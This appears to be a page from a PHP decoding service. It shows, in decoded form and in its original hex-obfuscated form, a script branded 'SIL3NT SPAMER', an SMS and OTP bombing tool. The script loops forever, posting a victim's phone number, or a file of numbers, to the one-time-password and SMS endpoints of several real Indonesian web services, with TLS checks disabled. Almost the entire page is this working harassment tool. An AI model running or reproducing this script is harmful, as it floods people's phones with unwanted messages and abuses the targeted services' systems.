Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
#!/usr/bin/env php #Dilarang copyright SIL3NT - AndroTech1733 2018 15 08 12:30 <?php..
Decoded Output download
#!/usr/bin/env php
#Dilarang copyright SIL3NT - AndroTech1733 2018 15 08 12:30
<?php
if(strtolower(substr(PHP_OS, 0, 3)) == 'win') {
$R = "";
$RR = "";
$G = "";
$GG = "";
$B = "";
$BB = "";
$Y = "";
$YY = "";
$X = "";
$ua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0';
} else {
$R = "\e[91m";
$RR = "\e[91;7m";
$G = "\e[92m";
$GG = "\e[92;7m";
$B = "\e[36m";
$BB = "\e[36;7m";
$Y = "\e[93m";
$YY = "\e[93;7m";
$X = "\e[0m";
$ua = 'Mozilla/5.0 (Linux; Android 5.1.1; Andromax A16C3H Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36';
system('clear');
}
if(function_exists('pcntl_signal')) {
declare(ticks = 1);
function signal_handler($signal) {
global $Y,$X;
switch($signal) {
case SIGTERM:
die($Y."
====================[] SIL3NT []=====()>".$X."
");
case SIGKILL:
die($Y."
====================[] SIL3NT []=====()>".$X."
");
case SIGINT:
die($Y."
====================[] SIL3NT []=====()>".$X."
");
}
}
pcntl_signal(SIGTERM, "signal_handler");
pcntl_signal(SIGINT, "signal_handler");
}
function post_data($url,$data) {
global $ua;
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, $ua);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
return curl_exec($ch);
curl_close($ch);
}
echo $Y.
"
___ ____ _____
|_ _/ ___|_ _|__ _ __ __ _ _ __ ___
| | | | |/ __| '_ \ / _` | '_ ` _ \
| | |___ | |\__ \ |_) | (_| | | | | | |
|___\____| |_||___/ .__/ \__,_|_| |_| |_|
|_|
";
echo $G."
========[]SIL3NT SPAMER[]========".$X."
";
echo $YY. $B."
::###############################################";
echo $R."
::############[WELCOME:MY:HOME]##################";
echo $YY."
::#: #";
echo $BB."
::#:Author ::[Deden Nefaily Herstain] #";
echo $B."
::#:Instagram ::[@Mujahidin.AlHasan:]#";
echo $RR."
::#:Github ::[http://github.com/SIIL3NT:] #";
echo $R."
::#:Facebook ::[AndroTech1733:] #";
echo $G."
::#:YouTube ::[SIL3NT GAMING:] #";
echo $GG."
::#:Team ::[SIL3NT - AndroTech1734] #";
echo $YY."
::#: #";
echo $R."
::###########[THANKS:YOU:FOR:WATCHING]###########";
echo $B."
::###############################################".$G.$X."
";
isset($argv[1]) OR die($RR."[!] []== Input Namber plish ==[] [!]
".$X);
if(is_numeric($argv[1])) {
echo "[]Prossesing Spam SmS[] #".$G.$argv[1].$X."
";
post_data("https://www.tokocash.com/oauth/otp","msisdn=".$argv[1]."&accept=call");
while(1) {
echo "[]SIL3NT Sending Massage To[] # ".$G.$argv[1].$X."
";
post_data("http://sc.jd.id/phone/sendPhoneSms","phone=".$argv[1]."&smsType=1");
post_data("https://www.phd.co.id/en/users/sendOTP","phone_number=".$argv[1]);
}
}
if(!file_exists($argv[1])) {
die($RR."[!] File Not Exists [!]".$X."
");
}
$argv[1]=explode("
",file_get_contents($argv[1]));
$argv[1]=str_replace(' ','',$argv[1]);
foreach($argv[1] as $argv[2]):
echo "[]Prossessing spam sms[] #".$G.$argv[2].$X."
";
post_data("https://www.tokocash.com/oauth/otp","msisdn=".$argv[2]."&accept=call");
endforeach;
while(1) {
foreach($argv[1] as $argv[2]):
echo "[]SIL3NT Sending Massage To[] # ".$G.$argv[2].$X."
";
post_data("http://sc.jd.id/phone/sendPhoneSms","phone=".$argv[2]."&smsType=1");
post_data("https://www.phd.co.id/en/users/sendOTP","phone_number=".$argv[2]);
endforeach;
}
?>
Did this file decode correctly?
Original Code
#!/usr/bin/env php
#Dilarang copyright SIL3NT - AndroTech1733 2018 15 08 12:30
<?php
if(strtolower(substr(PHP_OS, 0, 3)) == 'win') {
$R = "";
$RR = "";
$G = "";
$GG = "";
$B = "";
$BB = "";
$Y = "";
$YY = "";
$X = "";
$ua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0';
} else {
$R = "\e[91m";
$RR = "\e[91;7m";
$G = "\e[92m";
$GG = "\e[92;7m";
$B = "\e[36m";
$BB = "\e[36;7m";
$Y = "\e[93m";
$YY = "\e[93;7m";
$X = "\e[0m";
$ua = 'Mozilla/5.0 (Linux; Android 5.1.1; Andromax A16C3H Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36';
system('clear');
}
if(function_exists('pcntl_signal')) {
declare(ticks = 1);
function signal_handler($signal) {
global $Y,$X;
switch($signal) {
case SIGTERM:
die($Y."\n====================[] SIL3NT []=====()>".$X."\n");
case SIGKILL:
die($Y."\n====================[] SIL3NT []=====()>".$X."\n");
case SIGINT:
die($Y."\n====================[] SIL3NT []=====()>".$X."\n");
}
}
pcntl_signal(SIGTERM, "signal_handler");
pcntl_signal(SIGINT, "signal_handler");
}
function post_data($url,$data) {
global $ua;
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, $ua);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
return curl_exec($ch);
curl_close($ch);
}
echo $Y.
"
___ ____ _____
|_ _/ ___|_ _|__ _ __ __ _ _ __ ___
| | | | |/ __| '_ \ / _` | '_ ` _ \
| | |___ | |\__ \ |_) | (_| | | | | | |
|___\____| |_||___/ .__/ \__,_|_| |_| |_|
|_|
";
echo $G."\n========[]SIL3NT SPAMER[]========".$X."\n";
echo $YY. $B."\n::###############################################";
echo $R."\n::############[WELCOME:MY:HOME]##################";
echo $YY."\n::#: #";
echo $BB."\n::#:Author ::[Deden Nefaily Herstain] #";
echo $B."\n::#:Instagram ::[@Mujahidin.AlHasan:]#";
echo $RR."\n::#:Github ::[http://github.com/SIIL3NT:] #";
echo $R."\n::#:Facebook ::[AndroTech1733:] #";
echo $G."\n::#:YouTube ::[SIL3NT GAMING:] #";
echo $GG."\n::#:Team ::[SIL3NT - AndroTech1734] #";
echo $YY."\n::#: #";
echo $R."\n::###########[THANKS:YOU:FOR:WATCHING]###########";
echo $B."\n::###############################################".$G.$X."\n\n";
isset($argv[1]) OR die($RR."[!] []== Input Namber plish ==[] [!]\n".$X);
if(is_numeric($argv[1])) {
echo "[]Prossesing Spam SmS[] #".$G.$argv[1].$X."\n";
post_data("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x6b\x6f\x63\x61\x73\x68\x2e\x63\x6f\x6d\x2f\x6f\x61\x75\x74\x68\x2f\x6f\x74\x70","msisdn=".$argv[1]."&accept=call");
while(1) {
echo "[]SIL3NT Sending Massage To[] # ".$G.$argv[1].$X."\n";
post_data("\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x2e\x6a\x64\x2e\x69\x64\x2f\x70\x68\x6f\x6e\x65\x2f\x73\x65\x6e\x64\x50\x68\x6f\x6e\x65\x53\x6d\x73","phone=".$argv[1]."&smsType=1");
post_data("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x70\x68\x64\x2e\x63\x6f\x2e\x69\x64\x2f\x65\x6e\x2f\x75\x73\x65\x72\x73\x2f\x73\x65\x6e\x64\x4f\x54\x50","phone_number=".$argv[1]);
}
}
if(!file_exists($argv[1])) {
die($RR."[!] File Not Exists [!]".$X."\n");
}
$argv[1]=explode("\n",file_get_contents($argv[1]));
$argv[1]=str_replace(' ','',$argv[1]);
foreach($argv[1] as $argv[2]):
echo "[]Prossessing spam sms[] #".$G.$argv[2].$X."\n";
post_data("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x6b\x6f\x63\x61\x73\x68\x2e\x63\x6f\x6d\x2f\x6f\x61\x75\x74\x68\x2f\x6f\x74\x70","msisdn=".$argv[2]."&accept=call");
endforeach;
while(1) {
foreach($argv[1] as $argv[2]):
echo "[]SIL3NT Sending Massage To[] # ".$G.$argv[2].$X."\n";
post_data("\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x2e\x6a\x64\x2e\x69\x64\x2f\x70\x68\x6f\x6e\x65\x2f\x73\x65\x6e\x64\x50\x68\x6f\x6e\x65\x53\x6d\x73","phone=".$argv[2]."&smsType=1");
post_data("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x70\x68\x64\x2e\x63\x6f\x2e\x69\x64\x2f\x65\x6e\x2f\x75\x73\x65\x72\x73\x2f\x73\x65\x6e\x64\x4f\x54\x50","phone_number=".$argv[2]);
endforeach;
}
Function Calls
| None |
Stats
| MD5 | c6ba4b04b5f8781b00f0908f51d96642 |
| Eval Count | 0 |
| Decode Time | 89 ms |